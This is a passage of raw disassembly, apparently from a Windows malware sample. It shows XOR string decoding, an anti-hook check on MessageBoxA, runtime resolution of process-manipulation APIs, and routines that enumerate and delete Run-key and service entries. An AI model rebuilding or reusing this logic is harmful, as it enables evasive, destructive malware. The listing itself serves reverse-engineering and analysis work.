
loc_41A298:				; CODE XREF: sub_41A21C+47j
		mov	ecx, [ebp+var_4]
		pop	edi
		pop	esi
		xor	ecx, ebp
		pop	ebx
		call	sub_402C9E
		leave
		retn
sub_41A21C	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_41A2A7	proc near		; CODE XREF: sub_41C77E+24p

var_C		= byte ptr -0Ch
var_B		= byte ptr -0Bh
var_A		= byte ptr -0Ah
var_9		= byte ptr -9
var_8		= byte ptr -8
var_4		= dword	ptr -4

		push	ebp
		mov	ebp, esp
		sub	esp, 0Ch
		mov	eax, dword_424064
		xor	eax, ebp
		mov	[ebp+var_4], eax
		push	esi
		push	edi
		push	offset aMessageboxa_0 ;	"MessageBoxA"
		push	offset aUser32_dll ; "user32.dll"
		mov	[ebp+var_C], 55h
		mov	[ebp+var_B], 8Bh
		mov	[ebp+var_A], 0ECh
		mov	[ebp+var_9], 81h
		mov	[ebp+var_8], 0ECh
		call	ds:off_41E0E4
		push	eax
		call	ds:off_41E0E8
		push	5
		mov	esi, eax
		pop	ecx
		xor	eax, eax
		lea	edi, [ebp+var_C]
		repe cmpsb
		mov	ecx, [ebp+var_4]
		setz	al
		pop	edi
		xor	ecx, ebp
		pop	esi
		call	sub_402C9E
		leave
		retn
sub_41A2A7	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_41A301	proc near		; CODE XREF: sub_40177B+81p
					; sub_4019F3+81p ...

var_4		= dword	ptr -4
arg_0		= dword	ptr  8

		push	ebp
		mov	ebp, esp
		push	ecx
		push	edi
		push	[ebp+arg_0]
		xor	edi, edi
		push	edi
		push	esi
		call	sub_408130
		mov	eax, ebx
		add	esp, 0Ch
		lea	ecx, [eax+1]

loc_41A31A:				; CODE XREF: sub_41A301+1Ej
		mov	dl, [eax]
		inc	eax
		test	dl, dl
		jnz	short loc_41A31A
		sub	eax, ecx
		jz	short loc_41A38B
		mov	eax, [ebp+arg_0]
		dec	eax
		mov	[ebp+var_4], eax

loc_41A32C:				; CODE XREF: sub_41A301+88j
		mov	eax, offset aSutowxtbrioxkq ; "sutoWxTbRIoXkqst"
		lea	edx, [eax+1]

loc_41A334:				; CODE XREF: sub_41A301+38j
		mov	cl, [eax]
		inc	eax
		test	cl, cl
		jnz	short loc_41A334
		sub	eax, edx
		jz	short loc_41A341
		xor	eax, eax

loc_41A341:				; CODE XREF: sub_41A301+3Cj
		movsx	ecx, byte ptr [edi+ebx]
		movsx	eax, byte ptr aSutowxtbrioxkq[eax] ; "sutoWxTbRIoXkqst"
		xor	ecx, eax
		xor	ecx, 0B2h
		push	ecx
		push	esi
		push	offset dword_4218AC
		push	[ebp+var_4]
		push	esi
		call	sub_40307C
		mov	eax, esi
		add	esp, 14h
		lea	ecx, [eax+1]

loc_41A36C:				; CODE XREF: sub_41A301+70j
		mov	dl, [eax]
		inc	eax
		test	dl, dl
		jnz	short loc_41A36C
		sub	eax, ecx
		mov	[eax+esi], dl
		mov	eax, ebx
		inc	edi
		lea	ecx, [eax+1]

loc_41A37E:				; CODE XREF: sub_41A301+82j
		mov	dl, [eax]
		inc	eax
		test	dl, dl
		jnz	short loc_41A37E
		sub	eax, ecx
		cmp	edi, eax
		jb	short loc_41A32C

loc_41A38B:				; CODE XREF: sub_41A301+22j
		mov	eax, esi
		pop	edi
		leave
		retn
sub_41A301	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_41A390	proc near		; CODE XREF: sub_41A84D+28p

var_3C		= byte ptr -3Ch
var_38		= dword	ptr -38h
var_24		= dword	ptr -24h
var_20		= dword	ptr -20h
var_1C		= byte ptr -1Ch
ms_exc		= CPPEH_RECORD ptr -18h

		push	2Ch
		push	offset dword_422F20
		call	__SEH_prolog4
		mov	edi, ds:dword_41E104
		call	edi	; GetTickCount
		mov	[ebp+var_20], eax
		lea	eax, [ebp+var_1C]
		push	eax
		push	24h
		lea	eax, [ebp+var_3C]
		push	eax
		push	0
		push	ebx
		mov	esi, ds:off_41E028
		call	esi ; sub_456338
		test	eax, eax
		jnz	short loc_41A3CB

loc_41A3C0:				; CODE XREF: sub_41A390+61j
					; sub_41A390+8Aj ...
		call	ds:dword_41E0EC	; RtlGetLastWin32Error
		jmp	loc_41A45F
; ---------------------------------------------------------------------------

loc_41A3CB:				; CODE XREF: sub_41A390+2Ej
		cmp	[ebp+var_38], 1
		jz	loc_41A45D
		jmp	short loc_41A405
; ---------------------------------------------------------------------------

loc_41A3D7:				; CODE XREF: sub_41A390+79j
		push	[ebp+var_24]
		call	ds:off_41E0F8
		lea	eax, [ebp+var_1C]
		push	eax
		push	24h
		lea	eax, [ebp+var_3C]
		push	eax
		push	0
		push	ebx
		call	esi ; sub_456338
		test	eax, eax
		jz	short loc_41A3C0
		cmp	[ebp+var_38], 1
		jz	short loc_41A45D
		call	edi	; GetTickCount
		sub	eax, [ebp+var_20]
		cmp	eax, 12Ch
		ja	short loc_41A41E

loc_41A405:				; CODE XREF: sub_41A390+45j
		cmp	[ebp+var_38], 3
		jz	short loc_41A3D7
		lea	eax, [ebp+var_3C]
		push	eax
		push	1
		push	ebx
		call	ds:off_41E01C
		test	eax, eax
		jz	short loc_41A3C0
		jmp	short loc_41A457
; ---------------------------------------------------------------------------

loc_41A41E:				; CODE XREF: sub_41A390+73j
					; sub_41A390+C5j
		mov	eax, 5B4h
		jmp	short loc_41A45F
; ---------------------------------------------------------------------------

loc_41A425:				; CODE XREF: sub_41A390+CBj
		push	[ebp+var_24]
		call	ds:off_41E0F8
		lea	eax, [ebp+var_1C]
		push	eax
		push	24h
		lea	eax, [ebp+var_3C]
		push	eax
		push	0
		push	ebx
		call	esi ; sub_456338
		test	eax, eax
		jz	loc_41A3C0
		cmp	[ebp+var_38], 1
		jz	short loc_41A45D
		call	edi	; GetTickCount
		sub	eax, [ebp+var_20]
		cmp	eax, 12Ch
		ja	short loc_41A41E

loc_41A457:				; CODE XREF: sub_41A390+8Cj
		cmp	[ebp+var_38], 1
		jnz	short loc_41A425

loc_41A45D:				; CODE XREF: sub_41A390+3Fj
					; sub_41A390+67j ...
		xor	eax, eax

loc_41A45F:				; CODE XREF: sub_41A390+36j
					; sub_41A390+93j
		call	__SEH_epilog4
		retn
sub_41A390	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_41A465	proc near		; CODE XREF: sub_41AAD0+2C7p
					; sub_41AAD0+36Ep

var_30		= dword	ptr -30h
var_2C		= dword	ptr -2Ch
var_28		= dword	ptr -28h
var_24		= dword	ptr -24h
var_20		= dword	ptr -20h
var_1C		= dword	ptr -1Ch
var_18		= dword	ptr -18h
var_14		= dword	ptr -14h
var_10		= dword	ptr -10h
var_C		= dword	ptr -0Ch
var_8		= dword	ptr -8
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h

		push	ebp
		mov	ebp, esp
		sub	esp, 30h
		push	ebx
		push	esi
		push	edi
		push	10h
		pop	esi
		lea	eax, [ebp+var_10]
		push	eax
		push	[ebp+arg_4]
		xor	edi, edi
		push	edi
		mov	[ebp+var_8], esi
		call	ds:off_41E034
		test	eax, eax
		jnz	short loc_41A48C

loc_41A488:				; CODE XREF: sub_41A465+5Fj
		xor	al, al
		jmp	short loc_41A4FD
; ---------------------------------------------------------------------------

loc_41A48C:				; CODE XREF: sub_41A465+21j
		mov	eax, [ebp+var_10]
		mov	[ebp+var_2C], eax
		mov	eax, [ebp+var_C]
		mov	[ebp+var_28], eax
		lea	eax, [ebp+var_8]
		push	eax
		lea	eax, [ebp+var_20]
		push	eax
		push	esi
		mov	esi, ds:off_41E014
		lea	eax, [ebp+var_30]
		push	eax
		push	edi
		push	[ebp+arg_0]
		xor	ebx, ebx
		inc	ebx
		mov	[ebp+var_30], ebx
		mov	[ebp+var_24], edi
		call	esi ; sub_448B5E
		mov	edi, ds:dword_41E0EC
		call	edi	; RtlGetLastWin32Error
		test	eax, eax
		jnz	short loc_41A488
		mov	eax, [ebp+var_10]
		mov	[ebp+var_1C], eax
		mov	eax, [ebp+var_C]
		mov	[ebp+var_18], eax
		xor	eax, eax
		cmp	[ebp+arg_8], eax
		mov	[ebp+var_20], ebx
		jz	short loc_41A4E2
		or	[ebp+var_14], 2
		jmp	short loc_41A4E6
; ---------------------------------------------------------------------------

loc_41A4E2:				; CODE XREF: sub_41A465+75j
		and	[ebp+var_14], 0FFFFFFFDh

loc_41A4E6:				; CODE XREF: sub_41A465+7Bj
		push	eax
		push	eax
		push	[ebp+var_8]
		lea	ecx, [ebp+var_20]
		push	ecx
		push	eax
		push	[ebp+arg_0]
		call	esi ; sub_448B5E
		call	edi	; RtlGetLastWin32Error
		neg	eax
		sbb	al, al
		inc	al

loc_41A4FD:				; CODE XREF: sub_41A465+25j
		pop	edi
		pop	esi
		pop	ebx
		leave
		retn
sub_41A465	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_41A502	proc near		; CODE XREF: sub_41AAD0+400p

var_8		= dword	ptr -8
var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h

		push	ebp
		mov	ebp, esp
		push	ecx
		push	ecx
		push	ebx
		push	esi
		push	edi
		lea	eax, [ebp+var_8]
		push	eax
		push	[ebp+arg_8]
		xor	ebx, ebx
		push	[ebp+arg_C]
		mov	[ebp+var_8], ebx
		push	[ebp+arg_4]
		push	[ebp+arg_0]
		call	dword_429090
		test	eax, eax
		jnz	short loc_41A539

loc_41A529:				; CODE XREF: sub_41A502+70j
					; sub_41A502+74j
		push	[ebp+arg_C]
		call	sub_403129
		pop	ecx
		pop	edi
		pop	esi
		mov	al, bl
		pop	ebx
		leave
		retn
; ---------------------------------------------------------------------------

loc_41A539:				; CODE XREF: sub_41A502+25j
		xor	eax, eax

loc_41A53B:				; CODE XREF: sub_41A502+6Cj
		and	[ebp+var_4], 0
		mov	edx, offset dword_428050

loc_41A544:				; CODE XREF: sub_41A502+66j
		mov	esi, [ebp+arg_C]
		mov	ecx, [edx+80h]
		add	esi, eax
		mov	edi, edx
		xor	ebx, ebx
		repe cmpsb
		jz	short loc_41A574
		mov	ecx, 84h
		add	[ebp+var_4], ecx
		add	edx, ecx
		cmp	[ebp+var_4], 318h
		jb	short loc_41A544
		inc	eax
		cmp	eax, [ebp+var_8]
		jbe	short loc_41A53B
		xor	bl, bl
		jmp	short loc_41A529
; ---------------------------------------------------------------------------

loc_41A574:				; CODE XREF: sub_41A502+53j
		mov	bl, 1
		jmp	short loc_41A529
sub_41A502	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_41A578	proc near		; CODE XREF: sub_41AAD0+483p

var_1C		= dword	ptr -1Ch
var_14		= dword	ptr -14h
var_10		= dword	ptr -10h
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch

		push	ebp
		mov	ebp, esp
		sub	esp, 1Ch
		lea	eax, [ebp+var_1C]
		push	eax
		push	[ebp+arg_4]
		mov	[ebp+var_1C], 1Ch
		call	dword_42908C
		test	eax, eax
		jnz	short loc_41A59A
		xor	al, al
		leave
		retn
; ---------------------------------------------------------------------------

loc_41A59A:				; CODE XREF: sub_41A578+1Cj
					; sub_41A578+55j
		mov	eax, [ebp+var_10]
		cmp	eax, [ebp+arg_0]
		jnz	short loc_41A5BE
		push	[ebp+var_14]
		push	0
		push	1F03FFh
		call	dword_4290A0
		push	eax
		call	ds:off_41E0D0
		cmp	eax, 0FFFFFFFFh
		jz	short loc_41A5CF

loc_41A5BE:				; CODE XREF: sub_41A578+28j
		lea	eax, [ebp+var_1C]
		push	eax
		push	[ebp+arg_4]
		call	dword_4290B0
		test	eax, eax
		jnz	short loc_41A59A

loc_41A5CF:				; CODE XREF: sub_41A578+44j
		push	[ebp+arg_4]
		call	ds:off_41E0D8
		mov	al, 1
		leave
		retn
sub_41A578	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_41A5DC	proc near		; CODE XREF: sub_41AAD0+3BDp

var_1C		= dword	ptr -1Ch
var_14		= dword	ptr -14h
var_10		= dword	ptr -10h
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch

		push	ebp
		mov	ebp, esp
		sub	esp, 1Ch
		lea	eax, [ebp+var_1C]
		push	eax
		push	[ebp+arg_4]
		mov	[ebp+var_1C], 1Ch
		call	dword_42908C
		test	eax, eax
		jnz	short loc_41A5FE
		xor	al, al
		leave
		retn
; ---------------------------------------------------------------------------

loc_41A5FE:				; CODE XREF: sub_41A5DC+1Cj
					; sub_41A5DC+55j
		mov	eax, [ebp+var_10]
		cmp	eax, [ebp+arg_0]
		jnz	short loc_41A622
		push	[ebp+var_14]
		push	0
		push	1F03FFh
		call	dword_4290A0
		push	eax
		call	ds:off_41E0D4
		cmp	eax, 0FFFFFFFFh
		jz	short loc_41A633

loc_41A622:				; CODE XREF: sub_41A5DC+28j
		lea	eax, [ebp+var_1C]
		push	eax
		push	[ebp+arg_4]
		call	dword_4290B0
		test	eax, eax
		jnz	short loc_41A5FE

loc_41A633:				; CODE XREF: sub_41A5DC+44j
		push	[ebp+arg_4]
		call	ds:off_41E0D8
		mov	al, 1
		leave
		retn
sub_41A5DC	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_41A640	proc near		; CODE XREF: sub_41AAD0+3D4p

var_228		= dword	ptr -228h
var_214		= dword	ptr -214h
var_210		= dword	ptr -210h
var_4		= dword	ptr -4
arg_0		= dword	ptr  8

		push	ebp
		mov	ebp, esp
		sub	esp, 228h
		mov	eax, dword_424064
		xor	eax, ebp
		mov	[ebp+var_4], eax
		push	ebx
		push	edi
		push	[ebp+arg_0]
		xor	ebx, ebx
		push	8
		call	dword_429094
		mov	edi, eax
		cmp	edi, 0FFFFFFFFh
		jnz	short loc_41A679

loc_41A669:				; CODE XREF: sub_41A640+53j
		xor	al, al

loc_41A66B:				; CODE XREF: sub_41A640+8Dj
		mov	ecx, [ebp+var_4]
		pop	edi
		xor	ecx, ebp
		pop	ebx
		call	sub_402C9E
		leave
		retn
; ---------------------------------------------------------------------------

loc_41A679:				; CODE XREF: sub_41A640+27j
		lea	eax, [ebp+var_228]
		push	eax
		push	edi
		mov	[ebp+var_228], 224h
		call	dword_429088
		test	eax, eax
		jz	short loc_41A669

loc_41A695:				; CODE XREF: sub_41A640+6Bj
		inc	ebx
		cmp	ebx, 1
		jz	short loc_41A6B1
		lea	eax, [ebp+var_228]
		push	eax
		push	edi
		call	dword_4290A4
		test	eax, eax
		jnz	short loc_41A695
		xor	bl, bl
		jmp	short loc_41A6C4
; ---------------------------------------------------------------------------

loc_41A6B1:				; CODE XREF: sub_41A640+59j
		mov	eax, [ebp+var_214]
		mov	[esi], eax
		mov	eax, [ebp+var_210]
		mov	[esi+4], eax
		mov	bl, 1

loc_41A6C4:				; CODE XREF: sub_41A640+6Fj
		push	edi
		call	ds:off_41E0D8
		mov	al, bl
		jmp	short loc_41A66B
sub_41A640	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame fpd=1B4h


sub_41A6CF	proc near		; CODE XREF: sub_41AA85+2Dp

var_234		= dword	ptr -234h
var_230		= dword	ptr -230h
var_22C		= dword	ptr -22Ch
var_228		= dword	ptr -228h
var_224		= dword	ptr -224h
var_220		= dword	ptr -220h
var_21C		= dword	ptr -21Ch
var_218		= dword	ptr -218h
var_214		= dword	ptr -214h
var_210		= dword	ptr -210h
var_20C		= dword	ptr -20Ch
var_208		= dword	ptr -208h
var_204		= byte ptr -204h
var_104		= byte ptr -104h
var_103		= byte ptr -103h
var_4		= dword	ptr -4
arg_0		= dword	ptr  8

		push	ebp
		lea	ebp, [esp-1B4h]
		sub	esp, 234h
		mov	eax, dword_424064
		xor	eax, ebp
		mov	[ebp+1B4h+var_4], eax
		mov	eax, [ebp+1B4h+arg_0]
		push	ebx
		push	esi
		push	edi
		xor	ebx, ebx
		push	0FFh
		mov	[ebp+1B4h+var_224], eax
		lea	eax, [ebp+1B4h+var_103]
		push	ebx
		push	eax
		mov	[ebp+1B4h+var_234], offset aSoftwareMicr_5 ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
		mov	[ebp+1B4h+var_230], offset aSoftwareMicr_6 ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
		mov	[ebp+1B4h+var_22C], offset aSoftwareMicr_7 ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
		mov	[ebp+1B4h+var_228], offset aSoftwareMicr_8 ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
		mov	[ebp+1B4h+var_104], bl
		call	sub_408130
		mov	esi, 100h
		add	esp, 0Ch
		mov	[ebp+1B4h+var_21C], esi
		mov	[ebp+1B4h+var_214], esi
		mov	[ebp+1B4h+var_20C], offset dword_428044
		mov	[ebp+1B4h+var_220], 2

loc_41A748:				; CODE XREF: sub_41A6CF+160j
		mov	[ebp+1B4h+var_208], ebx

loc_41A74B:				; CODE XREF: sub_41A6CF+153j
		mov	eax, [ebp+1B4h+var_208]
		mov	eax, [ebp+eax*4+1B4h+var_234]
		lea	ecx, [ebp+1B4h+var_210]
		push	ecx
		push	1
		push	ebx
		push	eax
		mov	eax, [ebp+1B4h+var_20C]
		push	dword ptr [eax]
		call	ds:off_41E02C
		test	eax, eax
		jnz	loc_41A812
		lea	eax, [ebp+1B4h+var_214]
		push	eax
		lea	eax, [ebp+1B4h+var_204]
		push	eax
		push	ebx
		push	ebx
		lea	eax, [ebp+1B4h+var_21C]
		push	eax
		lea	eax, [ebp+1B4h+var_104]
		push	eax
		mov	[ebp+1B4h+var_218], ebx
		push	ebx
		jmp	short loc_41A7FE
; ---------------------------------------------------------------------------

loc_41A788:				; CODE XREF: sub_41A6CF+13Dj
		xor	edi, edi

loc_41A78A:				; CODE XREF: sub_41A6CF+10Cj
		mov	eax, [ebp+1B4h+var_224]
		lea	edx, [eax+1]

loc_41A790:				; CODE XREF: sub_41A6CF+C6j
		mov	cl, [eax]
		inc	eax
		cmp	cl, bl
		jnz	short loc_41A790
		sub	eax, edx
		push	eax
		push	[ebp+1B4h+var_224]
		lea	eax, [ebp+edi+1B4h+var_204]
		push	eax
		call	sub_402F77
		add	esp, 0Ch
		test	eax, eax
		jnz	short loc_41A7C9
		lea	eax, [ebp+1B4h+var_104]
		push	eax
		mov	eax, [ebp+1B4h+var_208]
		push	[ebp+eax*4+1B4h+var_234]
		mov	eax, [ebp+1B4h+var_20C]
		push	dword ptr [eax]
		call	sub_417BB2
		add	esp, 0Ch

loc_41A7C9:				; CODE XREF: sub_41A6CF+DDj
		lea	eax, [ebp+1B4h+var_204]
		inc	edi
		lea	edx, [eax+1]

loc_41A7D0:				; CODE XREF: sub_41A6CF+106j
		mov	cl, [eax]
		inc	eax
		cmp	cl, bl
		jnz	short loc_41A7D0
		sub	eax, edx
		cmp	edi, eax
		jbe	short loc_41A78A
		inc	[ebp+1B4h+var_218]
		lea	eax, [ebp+1B4h+var_214]
		push	eax
		lea	eax, [ebp+1B4h+var_204]
		push	eax
		push	ebx
		push	ebx
		lea	eax, [ebp+1B4h+var_21C]
		push	eax
		lea	eax, [ebp+1B4h+var_104]
		push	eax
		push	[ebp+1B4h+var_218]
		mov	[ebp+1B4h+var_21C], esi
		mov	[ebp+1B4h+var_214], esi

loc_41A7FE:				; CODE XREF: sub_41A6CF+B7j
		push	[ebp+1B4h+var_210]
		call	ds:off_41E020
		cmp	eax, 103h
		jnz	loc_41A788

loc_41A812:				; CODE XREF: sub_41A6CF+98j
		push	[ebp+1B4h+var_210]
		call	ds:off_41E010
		inc	[ebp+1B4h+var_208]
		cmp	[ebp+1B4h+var_208], 4
		jb	loc_41A74B
		add	[ebp+1B4h+var_20C], 4
		dec	[ebp+1B4h+var_220]
		jnz	loc_41A748
		mov	ecx, [ebp+1B4h+var_4]
		pop	edi
		pop	esi
		xor	ecx, ebp
		pop	ebx
		call	sub_402C9E
		add	ebp, 1B4h
		leave
		retn
sub_41A6CF	endp


; =============== S U B	R O U T	I N E =======================================



sub_41A84D	proc near		; CODE XREF: sub_41A89D+189p

arg_0		= dword	ptr  4

		push	ebx
		push	esi
		push	edi
		push	0F003Fh
		push	0
		push	0
		call	ds:off_41E024
		push	0F01FFh
		push	[esp+10h+arg_0]
		mov	esi, eax
		push	esi
		call	ds:off_41E044
		mov	edi, eax
		mov	ebx, edi
		call	sub_41A390
		push	edi
		call	ds:off_41E03C
		test	eax, eax
		jz	short loc_41A899
		mov	bl, 1

loc_41A887:				; CODE XREF: sub_41A84D+4Ej
		push	esi
		mov	esi, ds:off_41E040
		call	esi ; sub_446243
		push	edi
		call	esi ; sub_446243
		pop	edi
		pop	esi
		mov	al, bl
		pop	ebx
		retn
; ---------------------------------------------------------------------------

loc_41A899:				; CODE XREF: sub_41A84D+36j
		xor	bl, bl
		jmp	short loc_41A887
sub_41A84D	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame fpd=2C0h


sub_41A89D	proc near		; CODE XREF: sub_41AA85+35p
					; sub_41AA85:loc_41AAC2p

var_340		= dword	ptr -340h
var_33C		= dword	ptr -33Ch
var_338		= dword	ptr -338h
var_334		= byte ptr -334h
var_234		= byte ptr -234h
var_233		= byte ptr -233h
var_134		= byte ptr -134h
var_133		= byte ptr -133h
var_34		= byte ptr -34h
var_4		= dword	ptr -4
arg_0		= dword	ptr  8

		push	ebp
		lea	ebp, [esp-2C0h]
		sub	esp, 340h
		mov	eax, dword_424064
		xor	eax, ebp
		mov	[ebp+2C0h+var_4], eax
		push	esi
		mov	eax, [ebp+2C0h+arg_0]
		push	edi
		push	0Bh
		pop	ecx
		mov	esi, offset aSystemControls ; "SYSTEM\\ControlSet001\\Services\\Eventlog\\"...
		lea	edi, [ebp+2C0h+var_34]
		rep movsd
		movsw
		mov	esi, 0FFh
		push	esi
		mov	[ebp+2C0h+var_340], eax
		xor	edi, edi
		lea	eax, [ebp+2C0h+var_233]
		push	edi
		push	eax
		mov	[ebp+2C0h+var_234], 0
		call	sub_408130
		push	esi
		lea	eax, [ebp+2C0h+var_133]
		push	edi
		push	eax
		mov	[ebp+2C0h+var_134], 0
		call	sub_408130
		add	esp, 18h
		lea	eax, [ebp+2C0h+var_33C]
		push	eax
		push	0F003Fh
		push	edi
		lea	eax, [ebp+2C0h+var_34]
		push	eax
		push	80000002h
		call	ds:off_41E02C
		test	eax, eax
		jnz	loc_41AA65
		push	ebx
		mov	ebx, 100h
		push	ebx
		lea	eax, [ebp+2C0h+var_134]
		push	eax
		push	edi
		push	[ebp+2C0h+var_33C]
		mov	[ebp+2C0h+var_338], edi
		call	ds:off_41E018
		cmp	eax, 103h
		jz	loc_41AA64
		jmp	short loc_41A95A
; ---------------------------------------------------------------------------

loc_41A955:				; CODE XREF: sub_41A89D+1C1j
		mov	esi, 0FFh

loc_41A95A:				; CODE XREF: sub_41A89D+B6j
		push	ebx
		lea	eax, [ebp+2C0h+var_334]
		push	edi
		push	eax
		call	sub_408130
		push	ebx
		lea	eax, [ebp+2C0h+var_234]
		push	edi
		push	eax
		call	sub_408130
		lea	eax, [ebp+2C0h+var_134]
		push	eax
		lea	eax, [ebp+2C0h+var_34]
		push	eax
		push	offset aSS_5	; "%s\\%s"
		lea	eax, [ebp+2C0h+var_234]
		push	esi
		push	eax
		call	sub_40307C
		lea	eax, [ebp+2C0h+var_234]
		add	esp, 2Ch
		lea	esi, [eax+1]

loc_41A99F:				; CODE XREF: sub_41A89D+107j
		mov	cl, [eax]
		inc	eax
		test	cl, cl
		jnz	short loc_41A99F
		sub	eax, esi
		mov	[ebp+eax+2C0h+var_234],	cl
		lea	eax, [ebp+2C0h+var_134]
		push	offset aLdm	; "LDM"
		push	eax
		call	sub_402E37
		test	eax, eax
		pop	ecx
		pop	ecx
		jz	short loc_41AA42
		push	7
		mov	edi, offset aNetdde ; "NetDDE"
		lea	esi, [ebp+2C0h+var_134]
		pop	ecx
		xor	eax, eax
		repe cmpsb
		jz	short loc_41AA40
		push	ebx
		lea	eax, [ebp+2C0h+var_334]
		push	eax
		push	offset aEventmessagefi ; "EventMessageFile"
		lea	eax, [ebp+2C0h+var_234]
		push	eax
		push	1
		call	sub_417B4D
		add	esp, 14h
		test	al, al
		jz	short loc_41AA40
		xor	esi, esi

loc_41A9FB:				; CODE XREF: sub_41A89D+1A1j
		mov	eax, [ebp+2C0h+var_340]
		lea	edx, [eax+1]

loc_41AA01:				; CODE XREF: sub_41A89D+169j
		mov	cl, [eax]
		inc	eax
		test	cl, cl
		jnz	short loc_41AA01
		sub	eax, edx
		push	eax
		push	[ebp+2C0h+var_340]
		lea	eax, [ebp+esi+2C0h+var_334]
		push	eax
		call	sub_402F77
		add	esp, 0Ch
		test	eax, eax
		jnz	short loc_41AA2C
		lea	eax, [ebp+2C0h+var_134]
		push	eax
		call	sub_41A84D
		pop	ecx

loc_41AA2C:				; CODE XREF: sub_41A89D+180j
		lea	eax, [ebp+2C0h+var_334]
		inc	esi
		lea	edx, [eax+1]

loc_41AA33:				; CODE XREF: sub_41A89D+19Bj
		mov	cl, [eax]
		inc	eax
		test	cl, cl
		jnz	short loc_41AA33
		sub	eax, edx
		cmp	esi, eax
		jbe	short loc_41A9FB

loc_41AA40:				; CODE XREF: sub_41A89D+13Bj
					; sub_41A89D+15Aj
		xor	edi, edi

loc_41AA42:				; CODE XREF: sub_41A89D+127j
		inc	[ebp+2C0h+var_338]
		push	ebx
		lea	eax, [ebp+2C0h+var_134]
		push	eax
		push	[ebp+2C0h+var_338]
		push	[ebp+2C0h+var_33C]
		call	ds:off_41E018
		cmp	eax, 103h
		jnz	loc_41A955

loc_41AA64:				; CODE XREF: sub_41A89D+B0j
		pop	ebx

loc_41AA65:				; CODE XREF: sub_41A89D+8Aj
		push	[ebp+2C0h+var_33C]
		call	ds:off_41E010
		mov	ecx, [ebp+2C0h+var_4]
		pop	edi
		xor	ecx, ebp
		pop	esi
		call	sub_402C9E
		add	ebp, 2C0h
		leave
		retn
sub_41A89D	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_41AA85	proc near		; CODE XREF: sub_41AAD0+42Ap

arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h

		push	ebp
		mov	ebp, esp
		push	0FFFFFFFFh
		push	[ebp+arg_0]
		call	ds:off_41E0F4
		test	eax, eax
		jz	short loc_41AACC
		push	7D0h
		call	ds:off_41E0F8
		push	[ebp+arg_4]
		call	ds:off_41E0CC
		test	eax, eax
		push	[ebp+arg_8]
		jz	short loc_41AAC2
		call	sub_41A6CF
		push	[ebp+arg_8]
		call	sub_41A89D
		pop	ecx
		jmp	short loc_41AAC7
; ---------------------------------------------------------------------------

loc_41AAC2:				; CODE XREF: sub_41AA85+2Bj
		call	sub_41A89D

loc_41AAC7:				; CODE XREF: sub_41AA85+3Bj
		pop	ecx
		mov	al, 1
		pop	ebp
		retn
; ---------------------------------------------------------------------------

loc_41AACC:				; CODE XREF: sub_41AA85+10j
		xor	al, al
		pop	ebp
		retn
sub_41AA85	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_41AAD0	proc near		; DATA XREF: sub_41C77E+354o

var_569		= byte ptr -569h
var_568		= dword	ptr -568h
var_564		= dword	ptr -564h
var_560		= dword	ptr -560h
var_55C		= dword	ptr -55Ch
var_558		= dword	ptr -558h
var_554		= dword	ptr -554h
var_550		= dword	ptr -550h
var_54C		= dword	ptr -54Ch
var_548		= dword	ptr -548h
var_540		= dword	ptr -540h
var_524		= byte ptr -524h
var_420		= byte ptr -420h
var_318		= byte ptr -318h
var_317		= byte ptr -317h
var_210		= byte ptr -210h
var_4		= dword	ptr -4

		push	ebp
		mov	ebp, esp
		and	esp, 0FFFFFFF8h
		sub	esp, 56Ch
		mov	eax, dword_424064
		xor	eax, esp
		mov	[esp+56Ch+var_4], eax
		push	ebx
		push	esi
		push	edi
		xor	ebx, ebx
		push	103h
		lea	eax, [esp+57Ch+var_317]
		push	ebx
		push	eax
		mov	[esp+584h+var_318], bl
		call	sub_408130
		add	esp, 0Ch
		mov	[esp+578h+var_558], offset dword_4218C4
		mov	[esp+578h+var_554], offset dword_4218D4
		mov	[esp+578h+var_550], offset dword_4218E0
		call	sub_403076	; GetCurrentProcessId
		mov	edi, ds:dword_41E0E0
		push	offset aOpenthread ; "OpenThread"
		push	offset aKernel32_dll_0 ; "kernel32.dll"
		mov	[esp+580h+var_54C], eax
		call	edi	; GetModuleHandleA
		mov	esi, ds:off_41E0E8
		push	eax
		call	esi ; sub_45000F
		push	offset aOpenprocess ; "OpenProcess"
		push	offset aKernel32_dll_1 ; "kernel32.dll"
		mov	dword_4290A0, eax
		call	edi	; GetModuleHandleA
		push	eax
		call	esi ; sub_45000F
		push	offset aCreatetoolhelp ; "CreateToolhelp32Snapshot"
		push	offset aKernel32_dll_2 ; "kernel32.dll"
		mov	dword_4290AC, eax
		call	edi	; GetModuleHandleA
		push	eax
		call	esi ; sub_45000F
		push	offset aProcess32first ; "Process32First"
		push	offset aKernel32_dll_3 ; "kernel32.dll"
		mov	dword_429094, eax
		call	edi	; GetModuleHandleA
		push	eax
		call	esi ; sub_45000F
		push	offset aProcess32next ;	"Process32Next"
		push	offset aKernel32_dll_4 ; "kernel32.dll"
		mov	dword_429098, eax
		call	edi	; GetModuleHandleA
		push	eax
		call	esi ; sub_45000F
		push	offset aModule32first ;	"Module32First"
		push	offset aKernel32_dll_5 ; "kernel32.dll"
		mov	dword_42909C, eax
		call	edi	; GetModuleHandleA
		push	eax
